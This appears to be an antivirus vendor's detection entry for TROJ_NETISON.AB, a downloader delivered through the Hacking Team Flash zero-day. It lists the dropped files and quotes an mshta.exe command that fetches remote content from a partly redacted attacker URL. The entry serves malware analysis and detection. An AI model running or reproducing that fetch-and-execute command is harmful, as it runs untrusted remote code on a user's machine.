This is the detection for the payload related to the Hacking Team Flash zero-day affecting latest version of Flash in Windows, Mac, and Linux. Once this zero-day vulnerability has been successfully exploited, it downloads this malware. Users who visited the malicious website where the exploit is hosted, gets to download this malware on their system. TROJ_NETISON.AB downloads TROJ_FLASHUP.A and TROJ_FLASHUP.B.

It saves the files it downloads using the following names:

  • %Application Data%\flash\flash32.exe - detected as TROJ_FLASHUP.A
  • %Application Data%\Microsoft\Windows\Common\kbflashUpd.dll - detected as TROJ_FLASHUP.B

NOTES:

It creates an instance of mshta.exe with the following command line parameters:

  • mshta.exe "http://{BLOCKED}360.com/noname/minky/face.php?format=jason"
